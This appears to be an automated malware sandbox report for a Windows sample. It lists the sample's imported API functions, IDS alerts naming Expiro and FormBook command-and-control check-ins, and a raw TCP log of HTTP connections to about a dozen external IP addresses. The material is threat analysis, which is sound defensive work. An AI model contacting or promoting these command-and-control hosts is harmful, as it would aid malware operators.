                                                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishGreat Britain

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-10T19:51:08.322943+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54973954.244.188.17780TCP
                                                                                      2025-01-10T19:51:08.387989+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549739TCP
                                                                                      2025-01-10T19:51:08.387989+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549739TCP
                                                                                      2025-01-10T19:51:59.687647+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549993217.70.184.5080TCP
                                                                                      2025-01-10T19:52:16.251612+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549996154.23.184.20780TCP
                                                                                      2025-01-10T19:52:19.076856+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549997154.23.184.20780TCP
                                                                                      2025-01-10T19:52:21.667451+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549998154.23.184.20780TCP
                                                                                      2025-01-10T19:52:24.180350+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549999154.23.184.20780TCP
                                                                                      2025-01-10T19:52:31.116320+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000138.165.29.23480TCP
                                                                                      2025-01-10T19:52:33.663273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000238.165.29.23480TCP
                                                                                      2025-01-10T19:52:36.210109+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000338.165.29.23480TCP
                                                                                      2025-01-10T19:52:38.718025+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000438.165.29.23480TCP
                                                                                      2025-01-10T19:52:44.231988+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000613.248.169.4880TCP
                                                                                      2025-01-10T19:52:46.767778+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000713.248.169.4880TCP
                                                                                      2025-01-10T19:52:49.323291+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000813.248.169.4880TCP
                                                                                      2025-01-10T19:52:54.928853+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000913.248.169.4880TCP
                                                                                      2025-01-10T19:53:01.207547+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550010156.251.17.22480TCP
                                                                                      2025-01-10T19:53:03.758559+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011156.251.17.22480TCP
                                                                                      2025-01-10T19:53:06.289658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012156.251.17.22480TCP
                                                                                      2025-01-10T19:53:08.871146+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550013156.251.17.22480TCP
                                                                                      2025-01-10T19:53:14.544472+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550015194.245.148.18980TCP
                                                                                      2025-01-10T19:53:17.094264+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017194.245.148.18980TCP
                                                                                      2025-01-10T19:53:19.753906+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018194.245.148.18980TCP
                                                                                      2025-01-10T19:53:22.226767+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550019194.245.148.18980TCP
                                                                                      2025-01-10T19:53:28.544446+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002038.181.21.17880TCP
                                                                                      2025-01-10T19:53:31.091227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002138.181.21.17880TCP
                                                                                      2025-01-10T19:53:33.664998+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002238.181.21.17880TCP
                                                                                      2025-01-10T19:53:36.178966+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55002338.181.21.17880TCP
                                                                                      2025-01-10T19:53:41.983812+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024185.104.45.15780TCP
                                                                                      2025-01-10T19:53:44.516218+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550025185.104.45.15780TCP
                                                                                      2025-01-10T19:53:47.082130+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550026185.104.45.15780TCP
                                                                                      2025-01-10T19:53:50.554403+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550027185.104.45.15780TCP
                                                                                      2025-01-10T19:53:57.193009+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550028209.74.77.10780TCP
                                                                                      2025-01-10T19:53:59.570024+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550029209.74.77.10780TCP
                                                                                      2025-01-10T19:54:02.179232+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550030209.74.77.10780TCP
                                                                                      2025-01-10T19:54:04.620578+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550031209.74.77.10780TCP
                                                                                      2025-01-10T19:54:10.812551+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550032147.255.21.18780TCP
                                                                                      2025-01-10T19:54:13.396942+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550033147.255.21.18780TCP
                                                                                      2025-01-10T19:54:15.952941+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550034147.255.21.18780TCP
                                                                                      2025-01-10T19:54:18.487766+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550035147.255.21.18780TCP
                                                                                      2025-01-10T19:54:24.475560+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550036185.68.16.16080TCP
                                                                                      2025-01-10T19:54:27.008097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550037185.68.16.16080TCP
                                                                                      2025-01-10T19:54:29.535162+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550038185.68.16.16080TCP
                                                                                      2025-01-10T19:54:32.152320+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550039185.68.16.16080TCP
                                                                                      2025-01-10T19:54:38.029241+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550040194.195.220.4180TCP
                                                                                      2025-01-10T19:54:40.584163+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550041194.195.220.4180TCP
                                                                                      2025-01-10T19:54:43.102110+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550042194.195.220.4180TCP
                                                                                      2025-01-10T19:54:45.742263+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550043194.195.220.4180TCP
                                                                                      2025-01-10T19:54:51.454431+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55004663.250.43.13480TCP
                                                                                      2025-01-10T19:54:53.942443+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55004763.250.43.13480TCP
                                                                                      2025-01-10T19:54:56.687333+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55004863.250.43.13480TCP
                                                                                      2025-01-10T19:54:59.022957+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55004963.250.43.13480TCP
                                                                                      2025-01-10T19:55:04.939607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55005013.248.169.4880TCP
                                                                                      2025-01-10T19:55:07.682523+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55005113.248.169.4880TCP
                                                                                      2025-01-10T19:55:10.037635+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55005213.248.169.4880TCP
                                                                                      2025-01-10T19:55:12.761690+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55005313.248.169.4880TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 10, 2025 19:51:07.574104071 CET4973980192.168.2.554.244.188.177
                                                                                      Jan 10, 2025 19:51:07.578984022 CET804973954.244.188.177192.168.2.5
                                                                                      Jan 10, 2025 19:51:07.579046011 CET4973980192.168.2.554.244.188.177
                                                                                      Jan 10, 2025 19:51:07.579591036 CET4973980192.168.2.554.244.188.177
                                                                                      Jan 10, 2025 19:51:07.579638004 CET4973980192.168.2.554.244.188.177
                                                                                      Jan 10, 2025 19:51:07.584325075 CET804973954.244.188.177192.168.2.5
                                                                                      Jan 10, 2025 19:51:07.584346056 CET804973954.244.188.177192.168.2.5
                                                                                      Jan 10, 2025 19:51:08.322750092 CET804973954.244.188.177192.168.2.5
                                                                                      Jan 10, 2025 19:51:08.322870016 CET804973954.244.188.177192.168.2.5
                                                                                      Jan 10, 2025 19:51:08.322942972 CET4973980192.168.2.554.244.188.177
                                                                                      Jan 10, 2025 19:51:08.383282900 CET4973980192.168.2.554.244.188.177
                                                                                      Jan 10, 2025 19:51:08.387989044 CET804973954.244.188.177192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.057442904 CET4999380192.168.2.5217.70.184.50
                                                                                      Jan 10, 2025 19:51:59.062323093 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.062438011 CET4999380192.168.2.5217.70.184.50
                                                                                      Jan 10, 2025 19:51:59.073390961 CET4999380192.168.2.5217.70.184.50
                                                                                      Jan 10, 2025 19:51:59.078258991 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.687491894 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.687520027 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.687537909 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.687551975 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.687568903 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:51:59.687647104 CET4999380192.168.2.5217.70.184.50
                                                                                      Jan 10, 2025 19:51:59.687758923 CET4999380192.168.2.5217.70.184.50
                                                                                      Jan 10, 2025 19:51:59.724652052 CET4999380192.168.2.5217.70.184.50
                                                                                      Jan 10, 2025 19:51:59.729490995 CET8049993217.70.184.50192.168.2.5
                                                                                      Jan 10, 2025 19:52:15.328349113 CET4999680192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:15.333163023 CET8049996154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:15.333257914 CET4999680192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:15.403732061 CET4999680192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:15.414891005 CET8049996154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:16.251338959 CET8049996154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:16.251449108 CET8049996154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:16.251611948 CET4999680192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:16.914190054 CET4999680192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:17.942023039 CET4999780192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:17.946854115 CET8049997154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:17.946927071 CET4999780192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:18.061773062 CET4999780192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:18.066843987 CET8049997154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:19.076716900 CET8049997154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:19.076766968 CET8049997154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:19.076855898 CET4999780192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:19.569468021 CET4999780192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:20.601274967 CET4999880192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:20.606097937 CET8049998154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:20.606225014 CET4999880192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:20.684868097 CET4999880192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:20.689865112 CET8049998154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:20.689941883 CET8049998154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:21.667274952 CET8049998154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:21.667396069 CET8049998154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:21.667450905 CET4999880192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:22.194654942 CET4999880192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:23.213013887 CET4999980192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:23.217894077 CET8049999154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:23.217983961 CET4999980192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:23.227557898 CET4999980192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:23.232438087 CET8049999154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:24.180160046 CET8049999154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:24.180210114 CET8049999154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:24.180350065 CET4999980192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:24.183173895 CET4999980192.168.2.5154.23.184.207
                                                                                      Jan 10, 2025 19:52:24.187967062 CET8049999154.23.184.207192.168.2.5
                                                                                      Jan 10, 2025 19:52:29.580353022 CET5000180192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:29.585185051 CET805000138.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:29.585285902 CET5000180192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:29.600497007 CET5000180192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:29.605396986 CET805000138.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:31.116319895 CET5000180192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:31.121429920 CET805000138.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:31.121536016 CET5000180192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:32.134787083 CET5000280192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:32.139789104 CET805000238.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:32.139914036 CET5000280192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:32.153207064 CET5000280192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:32.158075094 CET805000238.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:33.663273096 CET5000280192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:33.668329000 CET805000238.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:33.668484926 CET5000280192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:34.682868004 CET5000380192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:34.687741995 CET805000338.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:34.687871933 CET5000380192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:34.703620911 CET5000380192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:34.708430052 CET805000338.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:34.708528042 CET805000338.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:36.210108995 CET5000380192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:36.215130091 CET805000338.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:36.215287924 CET5000380192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:37.229063034 CET5000480192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:37.237723112 CET805000438.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:37.237884045 CET5000480192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:37.247426987 CET5000480192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:37.252237082 CET805000438.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:38.717694044 CET805000438.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:38.717737913 CET805000438.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:38.717747927 CET805000438.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:38.718024969 CET5000480192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:38.720658064 CET5000480192.168.2.538.165.29.234
                                                                                      Jan 10, 2025 19:52:38.726128101 CET805000438.165.29.234192.168.2.5
                                                                                      Jan 10, 2025 19:52:43.750961065 CET5000680192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:43.755757093 CET805000613.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:43.755853891 CET5000680192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:43.779007912 CET5000680192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:43.783854961 CET805000613.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:44.231848955 CET805000613.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:44.231925964 CET805000613.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:44.231987953 CET5000680192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:45.288218021 CET5000680192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:46.307421923 CET5000780192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:46.312293053 CET805000713.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:46.312398911 CET5000780192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:46.327354908 CET5000780192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:46.332153082 CET805000713.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:46.767559052 CET805000713.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:46.767692089 CET805000713.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:46.767777920 CET5000780192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:47.835056067 CET5000780192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:48.853806973 CET5000880192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:48.858712912 CET805000813.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:48.858838081 CET5000880192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:48.874629021 CET5000880192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:48.879591942 CET805000813.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:48.879625082 CET805000813.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:49.322103977 CET805000813.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:49.323200941 CET805000813.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:49.323291063 CET5000880192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:50.382014990 CET5000880192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:51.400551081 CET5000980192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:51.405358076 CET805000913.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:51.405472040 CET5000980192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:51.415097952 CET5000980192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:51.419909954 CET805000913.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:54.928648949 CET805000913.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:54.928776026 CET805000913.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:52:54.928853035 CET5000980192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:54.931915045 CET5000980192.168.2.513.248.169.48
                                                                                      Jan 10, 2025 19:52:54.936698914 CET805000913.248.169.48192.168.2.5
                                                                                      Jan 10, 2025 19:53:00.306583881 CET5001080192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:00.311537027 CET8050010156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:00.311603069 CET5001080192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:00.328589916 CET5001080192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:00.333497047 CET8050010156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:01.207426071 CET8050010156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:01.207468987 CET8050010156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:01.207546949 CET5001080192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:01.835078001 CET5001080192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:02.855773926 CET5001180192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:02.860780954 CET8050011156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:02.861871004 CET5001180192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:02.876174927 CET5001180192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:02.880990028 CET8050011156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:03.758435011 CET8050011156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:03.758507967 CET8050011156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:03.758558989 CET5001180192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:04.382046938 CET5001180192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:05.400845051 CET5001280192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:05.405903101 CET8050012156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:05.409830093 CET5001280192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:05.425769091 CET5001280192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:05.430664062 CET8050012156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:05.430864096 CET8050012156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:06.288997889 CET8050012156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:06.289596081 CET8050012156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:06.289658070 CET5001280192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:06.933769941 CET5001280192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:07.948277950 CET5001380192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:07.953737020 CET8050013156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:07.953821898 CET5001380192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:07.965236902 CET5001380192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:07.970268011 CET8050013156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:08.866660118 CET8050013156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:08.867458105 CET8050013156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:08.871145964 CET5001380192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:08.871145964 CET5001380192.168.2.5156.251.17.224
                                                                                      Jan 10, 2025 19:53:08.875943899 CET8050013156.251.17.224192.168.2.5
                                                                                      Jan 10, 2025 19:53:13.916958094 CET5001580192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:13.921885967 CET8050015194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:13.922029972 CET5001580192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:13.935770035 CET5001580192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:13.940913916 CET8050015194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:14.544361115 CET8050015194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:14.544379950 CET8050015194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:14.544471979 CET5001580192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:15.444466114 CET5001580192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:16.463044882 CET5001780192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:16.468014956 CET8050017194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:16.468081951 CET5001780192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:16.487102985 CET5001780192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:16.491949081 CET8050017194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:17.093926907 CET8050017194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:17.094014883 CET8050017194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:17.094264030 CET5001780192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:17.991328001 CET5001780192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:19.009922028 CET5001880192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:19.014843941 CET8050018194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:19.017841101 CET5001880192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:19.032689095 CET5001880192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:19.037628889 CET8050018194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:19.037760019 CET8050018194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:19.753648996 CET8050018194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:19.753840923 CET8050018194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:19.753906012 CET5001880192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:20.538332939 CET5001880192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:21.560065031 CET5001980192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:21.564990997 CET8050019194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:21.569473028 CET5001980192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:21.575167894 CET5001980192.168.2.5194.245.148.189
                                                                                      Jan 10, 2025 19:53:21.579927921 CET8050019194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:22.225976944 CET8050019194.245.148.189192.168.2.5
                                                                                      Jan 10, 2025 19:53:22.226716995 CET8050019194.245.148.189192.168.2.5
